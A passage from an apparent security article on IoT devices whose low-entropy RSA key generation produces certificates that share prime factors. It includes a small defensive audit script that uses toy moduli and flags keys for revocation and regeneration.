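# 2048 bits or more). Indices stand in for device certificates in an inventory.
SAMPLE_MODULI = [
    101 * 103,   # 0: shares 101 with key 2
    107 * 109,   # 1: identical modulus to key 4
    101 * 113,   # 2: shares 101 with key 0
    127 * 131,   # 3: unique primes
    107 * 109,   # 4: identical modulus to key 1
]

if __name__ == "__main__":
    for index, verdict in audit_shared_primes(SAMPLE_MODULI).items():
        print(f"key {index}: {verdict} -> revoke and regenerate")
```

Any flagged key should be treated as compromised and reissued from a properly seeded random source, since a shared prime means the key was generated with too little entropy.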

In their report, ethical hacking specialists attribute this security weakness to the continued growth of IoT device use, as these devices have reduced entropy and significant energy constraints. Entropy is a fundamental factor in generating a secure random key: because these devices frequently generate the same random numbers when they try to identify prime numbers to use in RSA certificates, the chance that these certificates will share a prime value, and so become vulnerable to attack, greatly increases.

According to the International Institute of Cyber Security (IICS), it is vital to address these security risks, as we can currently find IoT devices in virtually every home in the world, so their use for malicious purposes could expose millions of users.    
